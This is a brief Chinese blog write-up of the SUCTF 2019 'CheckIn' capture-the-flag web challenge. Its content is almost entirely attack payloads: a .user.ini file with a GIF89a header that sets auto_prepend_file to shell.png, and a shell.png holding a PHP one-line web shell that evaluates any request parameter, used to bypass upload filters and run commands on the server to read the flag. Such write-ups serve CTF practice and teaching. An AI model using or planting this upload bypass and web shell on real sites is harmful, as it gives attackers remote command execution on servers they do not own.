[SUCTF 2019]CheckIn

CTF

图片.png

先上传.user.ini

GIF89a
auto_prepend_file=shell.png

图片.png

在上传shell.png

GIF89a
<script language="php">@eval($_REQUEST[a]);</script>

图片.png

访问/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php执行命令读取flag

图片.png

查看源代码

图片.png

如果觉得文章对你有用，请随意赞赏

ctf web writeup

[SUCTF 2019]CheckIn

https://www.bnessy.com/archives/suctf2019checkin

作者

Bnessy

发布于

2022-03-20

更新于

2022-03-23

许可协议

CC BY 4.0